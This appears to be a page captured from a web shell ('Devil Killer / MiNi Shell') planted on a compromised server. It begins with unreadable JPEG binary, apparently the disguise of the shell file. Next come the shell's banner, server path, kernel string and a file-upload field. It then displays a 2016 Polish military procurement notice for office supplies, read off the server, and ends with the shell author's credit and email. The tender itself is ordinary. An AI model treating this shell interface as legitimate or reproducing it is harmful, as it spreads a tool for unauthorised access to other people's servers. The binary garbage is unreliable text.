JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160517/123758-N-2016.html

<p class="kh_header"><b>Poznań: Dostawa artykułów i urządzeń administracyjno - biurowych</b><br>
<b>Numer ogłoszenia: 123758 - 2016; data zamieszczenia: 17.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 14 Wojskowy Oddział Gospodarczy , ul. Bukowska 34, 60-811 Poznań, woj. wielkopolskie, tel. 261 57 48 02, faks 261 57 72 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.14wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów i urządzeń administracyjno - biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla 14 Wojskowego Oddziału Gospodarczego w Poznaniu artykułów i urządzeń administracyjno - biurowych m. in. druki akcydensowe,  etykiety adresowe, folia do drukarek, papier biały, papier do plotera, papier ksero, zeszyty (zadanie 1); bloczki samoprzylepne, blok techniczny brystol, kalendarze, datowniki, kartony, kieszeń (obwoluta,ofertówka,koszulka), kleje, koperty kostki do wydzierania kartek, okładki do termobindownicy, okładki do oprawy kanałowej, podkłady na biurko, skoroszyty, skorowidze,  taśmy, teczki, zakładki indeksujące (zadanie 2), tablice korkowe, suchościeralne, antyramy (zadanie 3), organizer polowy, plan miasta, skoroszyt A4 (zadanie 4), sznurek, dziurkacze, nawilżacz do palców, holder, igły, klipsy, magnesy do tablicy nożyce, nóż do papieru, numerator automatyczny, okładki archiwizacyjne, pinezki do tablic korkowych i zwykłe, pistolet do kleju na gorąco, płyn do zmywania tablic suchościeralnych, podajnik do taśm samoprzylepnych, poduszka do stempli, pojemnik magnetyczny na spinacze, przybornik, przekładki do segregatora, pudła archiwizacyjne rozszywacze do usuwania zszywek,segregatory, tuby, wąsy do akt, wizytownik, wskaźnik konferencyjny, zszywacz długoramienny (zadanie nr 5)  w ilościach i asortymencie wymienionym w formularzu cenowym stanowiącym załącznik nr 5 do SIWZ.
Szczegółowy opis przedmiotu zamówienia wraz z wykazem artykułów, zawiera załącznik nr 5 (5/1-zadanie 1; 5/2-zadanie 2; 5/3-zadanie; 5/4-zadanie 4; 5/5-zadanie 5) do SIWZ oraz w projekt umowy stanowiący załącznik nr 6  (6/1-zadanie 1; 6/2-zadanie 2; 6/3-zadanie; 6/4-zadanie 4; 6/5-zadanie 5) do SIWZ.
Zamawiający dopuszcza składanie ofert częściowych poprzez składanie ofert na poszczególne zadania. Za ofertę częściową uważa się ofertę obejmującą pełny asortyment danego zadania. Liczba zadań 5:
Zadanie nr 1 - zakup druków akcydensowych, zeszytów i papieru do druku

Zadanie 2 - zakup materiałów papierniczych, okładki i koperty
Zadanie 3 - zakup tablic, antyram i ramek
Zadanie nr 4  - zakup map i organizerów
Zadanie 5 - zakup wyposażenia i urządzeń biurowych


Zamawiający w ramach prawa opcji zastrzega sobie możliwość zwiększenia wartości umowy o maksymalnie:
a)	zadanie nr 1-   24 876,24 zł netto;
b)	zadanie nr 2 -  27 258,41 zł netto;
c)	zadanie nr 3 - 10 362,75 zł netto;
d)	zadanie nr 4 -   1 813,60 zł netto
e)	zadanie nr 5 -  15 708,02 zł netto

na zakup dodatkowych ilości asortymentu wyszczególnionego w załączniku nr 5 do SIWZ              w przypadku zwiększenia się zapotrzebowania na określone artykuły niezbędne dla prawidłowego funkcjonowania Zamawiającego (zgodnie z zapisami projektu umowy dla poszczególnych zadań).
Realizacja zamówienia (dostawa asortymentu wraz z fakturą) w ramach prawa opcji musi być zrealizowana najpóźniej do dnia 23 grudnia 2016 r.

Realizacja zamówienia podstawowego nastąpi sukcesywnie od dnia podpisania umowy do 31.10 2016r

Realizacja zamówienia w ramach prawa opcji dla wszystkich zadań częściowych nastąpi do dnia 23 grudnia 2016 roku lub wyczerpania kwoty z umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9, 22.80.00.00-8, 22.81.60.00-3, 22.81.61.00-4, 30.19.76.30-1, 22.81.50.00-6, 22.81.63.00-6, 22.81.61.00-4, 22.85.00.00-3, 22.81.70.00-0, 24.91.00.00-6, 30.19.92.30-1, 39.54.11.20-3, 39.56.11.10-6, 30.19.97.92-8, 30.19.54.00-6, 44.14.20.00-7, 22.11.43.00-5, 22.81.70.00-0, 30.19.70.00-6, 30.19.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku Wykonawcy złożą oświadczenie zgodnie                   z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku Wykonawcy złożą oświadczenie zgodnie                   z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku Wykonawcy złożą oświadczenie zgodnie                   z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku Wykonawcy złożą oświadczenie zgodnie                   z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku Wykonawcy złożą oświadczenie zgodnie                   z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.	Ponadto Wykonawca załączy do oferty: 
1)	wypełniony Formularz ofertowy stanowiący załącznik nr 1 do SIWZ; 
2)	wypełniony formularz cenowy stanowiący załącznik nr 5  (5/1-zadanie 1; 5/2-zadanie 2; 5/3-zadanie; 5/4-zadanie 4; 5/4-zadanie 5) do SIWZ.
3)	pełnomocnictwo dla osoby podpisującej ofertę, do podejmowania zobowiązań w imieniu Wykonawcy (jeżeli reprezentuje go pełnomocnik) lub w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o ile nie wynika ono z przepisów prawa lub innych dokumentów;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatnosci - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Umowa na wykonanie zamówienia sporządzona będzie zgodnie z projektem stanowiącym załącznik nr 6 do SIWZ (6/1-zadanie 1; 6/2-zadanie 2; 6/3-zadanie 3;                6/4-zadanie 4; 6/5-zadanie 5) -  Projekt umowy.
2.	Zamawiający zastrzega sobie prawo zmian w treści umowy zgodnie z projektem umowy stanowiącym załącznik nr 6 do  SIWZ .
3.	W przypadku wycofania asortymentu z produkcji lub sprzedaży wskazanego 
w formularzu cenowym (załącznik nr 1 do umowy) po przedstawieniu stosownych dokumentów przez Wykonawcę, zastąpiony on będzie innym, zaakceptowanym przez Zamawiającego, o nie gorszych parametrach i nie wyższej cenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.14wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 14 Wojskowy Oddział Gospodarczy w Poznaniu, ul. Bukowska 34, 60-811 Poznań- Sekcja zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2016 godzina 12:00, miejsce: 14 Wojskowy Oddział Gospodarczy w Poznaniu, ul. Bukowska 34, 60-811 Poznań - Kancelaria Jawna- czynna w dniach od pon.-do pt. w godz. 7.30-11.00 oraz 13.00-15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - zakup druków akcydensowych, zeszytów i papieru do druku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla 14 Wojskowego Oddziału Gospodarczego             w Poznaniu artykułów i urządzeń administracyjno - biurowych m. in. druki akcydensowe,  etykiety adresowe, folia do drukarek, papier biały, papier do plotera, papier ksero, zeszyty (zadanie 1).
Szczegółowy opis przedmiotu zamówienia wraz z wykazem artykułów, zawiera załącznik nr 5 do SIWZ oraz projekt umowy stanowiący załącznik nr 6  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9, 22.80.00.00-8, 22.81.60.00-3, 22.81.61.00-4, 30.19.76.30-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatnosci - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - zakup materiałów papierniczych, okładki i koperty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla 14 Wojskowego Oddziału Gospodarczego             w Poznaniu artykułów i urządzeń administracyjno - biurowych m. in. bloczki samoprzylepne, blok techniczny brystol, kalendarze, datowniki, kartony, kieszeń (obwoluta,ofertówka,koszulka), kleje, koperty kostki do wydzierania kartek, okładki do termobindownicy, okładki do oprawy kanałowej, podkłady na biurko, skoroszyty, skorowidze,  taśmy, teczki, zakładki indeksujące (zadanie 2).
Szczegółowy opis przedmiotu zamówienia wraz z wykazem artykułów, zawiera załącznik nr 5  do SIWZ oraz w projekt umowy stanowiący załącznik nr 6  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.81.50.00-6, 22.81.63.00-6, 22.81.61.00-4, 22.85.00.00-3, 22.81.70.00-0, 24.91.00.00-6, 30.19.92.30-1, 39.54.11.20-3, 39.56.11.10-6, 30.19.97.92-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatnosci - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - zakup tablic, antyram i ramek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla 14 Wojskowego Oddziału Gospodarczego    w Poznaniu artykułów i urządzeń administracyjno - biurowych m. in. tablice korkowe, suchościeralne, antyramy (zadanie 3). 
Szczegółowy opis przedmiotu zamówienia wraz z wykazem artykułów, zawiera załącznik nr 5 do SIWZ oraz w projekt umowy stanowiący załącznik nr 6  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.54.00-6, 44.14.20.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatnosci - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4  - zakup map i organizerów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla 14 Wojskowego Oddziału Gospodarczego             w Poznaniu artykułów i urządzeń administracyjno - biurowych m. in. organizer polowy, plan miasta, skoroszyt A4 (zadanie 4) w ilościach i asortymencie wymienionym w formularzu cenowym stanowiącym załącznik nr 5 do SIWZ.
Szczegółowy opis przedmiotu zamówienia wraz z wykazem artykułów, zawiera załącznik nr 5  do SIWZ oraz  projekt umowy stanowiący załącznik nr 6  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.11.43.00-5, 22.81.70.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatnosci - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - zakup wyposażenia i urządzeń biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla 14 Wojskowego Oddziału Gospodarczego             w Poznaniu artykułów i urządzeń administracyjno - biurowych m. in. sznurek, dziurkacze, nawilżacz do palców, holder, igły, klipsy, magnesy do tablicy nożyce, nóż do papieru, numerator automatyczny, okładki archiwizacyjne, pinezki do tablic korkowych i zwykłe, pistolet do kleju na gorąco, płyn do zmywania tablic suchościeralnych, podajnik do taśm samoprzylepnych, poduszka do stempli, pojemnik magnetyczny na spinacze, przybornik, przekładki do segregatora, pudła archiwizacyjne rozszywacze do usuwania zszywek,segregatory, tuby, wąsy do akt, wizytownik, wskaźnik konferencyjny, zszywacz długoramienny (zadanie nr 5)                   w ilościach i asortymencie wymienionym w formularzu cenowym stanowiącym załącznik nr 5 do SIWZ.
Szczegółowy opis przedmiotu zamówienia wraz z wykazem artykułów, zawiera załącznik nr 5 do SIWZ oraz projekt umowy stanowiący załącznik nr 6  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6, 30.19.20.00-1, 30.19.21.50-7, 39.22.71.10-3, 39.24.10.00-3, 39.26.31.00-4, 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatnosci - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com